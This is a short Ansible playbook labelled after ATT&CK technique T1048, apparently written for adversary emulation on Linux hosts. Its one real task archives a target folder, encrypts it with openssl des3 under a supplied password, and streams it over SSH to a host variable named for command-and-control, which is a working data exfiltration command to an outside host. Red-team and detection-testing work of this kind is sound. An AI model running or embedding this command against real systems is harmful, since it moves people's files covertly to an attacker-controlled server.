# Playbook-T1048
- name : Exfiltration Over Alternative Protocol
  hosts: linux
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
    - name: Ansible check directory exists example.
      stat:
        path: "{{ exfiltration_folder }}"
      register: exfil_check
    - name: Exfiltration Over Alternative Protocol - SSH
      shell: |
        tar czpf - {{ exfiltration_folder }}/* | openssl des3 -salt -k {{ password_encryption }} | ssh {{ cnc_fqdn }} 'cat > {{ exfiltration_file }}.tar.gz.enc'
      when: exfil_check.stat.exists
